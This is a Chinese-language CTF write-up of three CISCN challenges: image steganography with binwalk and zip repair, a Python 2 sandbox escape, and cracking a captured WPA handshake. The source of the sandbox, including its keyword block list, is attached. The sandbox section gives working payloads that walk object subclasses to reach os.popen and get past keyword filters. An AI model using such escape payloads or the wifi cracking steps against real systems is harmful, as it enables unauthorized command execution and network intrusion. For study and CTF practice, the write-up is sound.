picture

1、另存为图片,binwalk 下发现 zlib 数据;

[Go0s]: ~/Desktop 
➜  binwalk ctf_02_Quy2aFl.jpeg                                                  

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
38884         0x97E4          Zlib compressed data, default compression

2、使用 binwalk -e 提取 zlib 数据;

[Go0s]: ~/Desktop 
➜  binwalk -e ctf_02_Quy2aFl.jpeg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
38884         0x97E4          Zlib compressed data, default compression

3、使用 zlib_decompress 解压缩 zlib 数据;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  zlib_decompress 97E4.zlib 1.txt 

4、查看解压后的数据,base64 解码,发现明显 zip 压缩文件的PK字样及 password 字样;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  cat 1.txt 
S1ADBBQAAQAAAE0wl0ynPOJhWgAAAE4AAAAEAAAAY29kZVmbl9yAjdBdFP/dG/1FDP0ukDBQb9qt5LUn+UsSEd/ECCvK7A+5WyGaWgHSYOFaqK+qP9IU8r6FD+mL7KSlds3nqn0vd9NSsAlWGzsr2YkBhjk1mMfglGM3plBLAQI/ABQAAQAAAE0wl0ynPOJhWgAAAE4AAAAEACQAAAAAAAAAIAAAAAAAAABjb2RlCgAgAAAAAAABABgAAIU4mYXa0wHiHQeth9rTAeIdB62H2tMBUEsFBgAAAAABAAEAVgAAAHwAAADcAFtQeXRob24gMi43XQ0KPj4+IKh9qH2ofQ0KDQpUcmFjZWJhY2sgKG1vc3QgcmVjZW50IGNhbGwgbGFzdCk6DQogIEZpbGUgIjxweXNoZWxsIzA+IiwgbGluZSAxLCBpbiA8bW9kdWxlPg0KICAgIKh9qH2ofQ0KWmVyb0RpdmlzaW9uRXJyb3I6IKh9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofah9qH2ofSA8LSBwYXNzd29yZCA7KQ0KPj4+IAA=%                                                                                               [Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  cat 1.txt | base64 -D
KPM0?L?<?aZNcodeY??܀??]??E
                          ?.?0Poڭ?'?K?+???[!?Z?`?Z???????줥v??}/w?R?	V+ى?95????c7?PK?M0?L?<?aZN$ code
 ?8??????????????PKV|?[Python 2.7]
>>> ?}?}?}

Traceback (most recent call last):
  File "<pyshell#0>", line 1, in <module>
    ?}?}?}
ZeroDivisionError: ?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?} <- password ;)
>>> %             

5、将 base64 解码后的数据使用 hexdump 查看发现 PK 头【50 4b】反了,使用 010editor 修复 zip 头;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  cat 1.txt | base64 -D  > 1.zip                       
[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  hexdump 1.zip 
0000000 4b 50 03 04 14 00 01 00 00 00 4d 30 97 4c a7 3c
0000010 e2 61 5a 00 00 00 4e 00 00 00 04 00 00 00 63 6f
...

6、解压缩 zip,提示需要密码;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  file 1.zip 
1.zip: Zip archive data, at least v2.0 to extract
[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  unzip 1.zip 
Archive:  1.zip
[Python 2.7]
>>> ?}?}?}

Traceback (most recent call last):
  File "<pyshell#0>", line 1, in <module>
    ?}?}?}
ZeroDivisionError: ?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?}?} <- password ;)
>>> 
[1.zip] code password: 

7、脑洞,由于 zip 的压缩包有“备注?”写有“<- password”,猜测“ZeroDivisionError”后的一串问号代表的就是密码,搜索ZeroDivisionError报错,发现“ZeroDivisionError: integer division or modulo by zero. ”,密码为“integer division or modulo by zero”;

解压出code文件,file 查看下属性发现是 uuencode 编码压缩文件;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  file code 
code: uuencoded or xxencoded text, ASCII text

8、使用在线工具:http://web.chacuo.net/charsetuuencode 提取编码部分:G0TE30TY[-3(Q,$$Q.3A!-#(U,T9&,C4T,[email protected],S8V-4%#-4(Y-$9],解码为:CISCN{5210A198A4253FF2541833665AC5B94F};

或者直接添加扩展名 uu,解压缩即可;

[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  mv code code.uu
使用压缩工具解压出code文件;
[Go0s]: ~/Desktop/_ctf_02_Quy2aFl.jpeg.extracted 
➜  cat code
CISCN{5210A198A4253FF2541833665AC5B94F}%   

Run

Python 沙箱突破题

1、寻找规律,发现import导包被禁止,“ eval subprocess os ls cat exec sys”等关键词也被禁止,后来读取了源文件也证实了猜想;

2、在博文2中寻找到读取文件的绕过命令:().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read(),读取/etc/passwd文件发现ctf用户;

>>>print ().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
root:x:0:0:root:/root:/bin/bash
...
ctf:x:1000:1000::/home/ctf:/bin/rbash

3、().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' ) 由于过滤了ls字段,则将func_globals查看全局函数列表也误伤了,使用__getattribute__('func_global'+'s')来绕过;

又由于其是字典类型,参考博文1使用["linecache"],但其没有eval函数,替换为os,其中os ls cat等关键字命令使用字符串拼接绕过;

最终payload:

print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')["linecache"].__dict__['o'+'s'].__dict__['popen' ]('l'+'s /home/ctf').read()
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')["linecache"].__dict__['o'+'s'].__dict__['popen' ]('ca'+'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb').read()

>>>print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')["linecache"].__dict__['o'+'s'].__dict__['popen' ]('ca'+'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb').read()
ciscn{c4f1c16c822bb5039e2401fa764ce0ef}

参考博文:

https://blog.0kami.cn/2016/09/16/old-python-sandbox-escape

https://blog.csdn.net/qq_35078631/article/details/78504415

寻找入侵者

1、由提示可知 attack.pcapng 包里的某Mac地址为wifi密码,这里鸡贼一下将所有出现的Mac地址另存为pass.txt;

QQ20180430-191453@2x.png

2、使用 aircrack-ng 发现 hanshake.cap 中存在握手包,可以直接来利用pass.txt字典来跑,跑出密码为:88:25:93:c1:c8:eb;

QQ20180430-220405@2x.png

3、使用 airdecap-ng 解开加密的wifi的数据包;

QQ20180430-221521@2x.png

4、打开数据包,发现 http 协议 get 了一个 key.rar 的地址,直接访问同样的地址http://wiattack.net//HR2D1k5cVc/key.rar下载到 rar,解压为一个 pcap 文件;

5、打开 key.pcap,最后一个数据包最后的数据字符即为flag: CISCN{4qgVp9ufsXMpODy2YZada27J1ZNLVjKmB};

BTW:

知道密码后可以使用wireshark来解密,首先需要生成密码、SSID对应的PSK,wireshark官方生成地址:https://www.wireshark.org/tools/wpa-psk.html

QQ20180501-164256@2x.png

使用wireshark打开hanshark.cap加密包,因为加密搜索http协议包是无法搜索到的;

具体流程同导入SSL的key:Wireshark -- Perferences -- IEEE802.11 -- Decryption keys Edit -- 输入生成的PSK字符串 -- OK

Wireshark会重新载入数据包,搜索http协议包发现出现了,解密成功;

附件

1、picture:ctf_02_Quy2aFl.jpeg 2、Run:

gamebox.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2018-04-09 23:30:58
# @Author  : Xu ([email protected])
# @Link    : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict
from types import FunctionType

main = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__


def delete_type():
    type_dict = get_dict(type)
    del type_dict['__bases__']
    del type_dict['__subclasses__']


def delete_func_code():
    func_dict = get_dict(FunctionType)
    del func_dict['func_code']


def safe_import(__import__, whiteList):
    def importer(name, globals={}, locals={}, fromlist=[], level=-1):
        if name in whiteList:
            return __import__(name, globals, locals, fromlist, level)
        else:
            print "HAHA,[%s]  has been banned~" % name
    return importer


class ReadOnly(dict):
    """docstring for ReadOnlu"""

    def __delitem__(self, keys):
        raise ValueError(":(")

    def pop(self, key, default=None):
        raise ValueError(":(")

    def popitem(self):
        raise ValueError(":(")

    def setdefault(self, key, value):
        raise ValueError(":(")

    def __setitem__(self, key, value):
        raise ValueError(":(")

    def __setattr__(self, name, value):
        raise ValueError(":(")

    def update(self, dict, **kwargs):
        raise ValueError(":(")


def builtins_clear():
    whiteList = "raw_input  SyntaxError   ValueError  NameError  Exception __import__".split(
        " ")
    for mod in __builtins__.__dict__.keys():
        if mod not in whiteList:
            del __builtins__.__dict__[mod]


def input_filter(string):
    ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
    for i in ban:
        if i in string.lower():
            print "{} has been banned!".format(i)
            return ""
    return string


# delete_type();
del delete_type
delete_func_code()
del delete_func_code
builtins_clear()
del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__, whiteMod)
safe_builtins = ReadOnly(origin_builtins)
del ReadOnly
main['__builtins__'] = safe_builtins
del safe_builtins

del get_dict, modules, origin_builtins, safe_import, whiteMod, main, FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
  ____                  
 |  _ \ _   _ _ __      
 | |_) | | | | '_ \     
 |  _ <| |_| | | | |    
 |_| \_\\__,_|_| |_|    
                        

Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it !  D:"
    except SyntaxError, e:
        print "Noob! Synax Wrong! :("
    except Exception, e:
        print "unknow error,try again  :>"

cpython.py

from ctypes import pythonapi, POINTER, py_object

_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]

del pythonapi, POINTER, py_object


def get_dict(ob):
    return _get_dict(ob).contents.value